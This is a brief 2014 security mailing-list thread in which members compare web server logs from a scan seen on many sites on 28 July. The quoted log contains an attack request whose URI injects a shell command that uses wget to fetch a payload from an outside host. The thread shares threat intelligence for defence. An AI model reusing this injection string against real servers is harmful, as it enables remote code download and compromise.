Same here. My employer’s WAF blocked them though. On 28 Jul 2014, at 15:30, Frank Michael <frankcmich...@gmail.com> wrote:
> Various sources confirming the same thing for other sites. All on 7/28. Keep > an eye open. > > On Jul 28, 2014, at 5:09 AM, Robin Wood <robin@digi.ninja> wrote: > >> I've got a site that was scanned this morning by a tool that left these >> entries in the logs: >> >> [HTTP_USER_AGENT] => chroot-apach0day >> [HTTP_REFERRER] => /xA/x0a/x05 >> [REQUEST_URI] => >> /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day; >> >> Anyone recognise it? That user agent isn't coming up in google searches. >> >> Robin >> _______________________________________________ >> Pauldotcom mailing list >> Pauldotcom@mail.securityweekly.com >> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom >> Main Web Site: http://pauldotcom.com > _______________________________________________ > Pauldotcom mailing list > Pauldotcom@mail.securityweekly.com > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom > Main Web Site: http://pauldotcom.com
_______________________________________________ Pauldotcom mailing list Pauldotcom@mail.securityweekly.com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
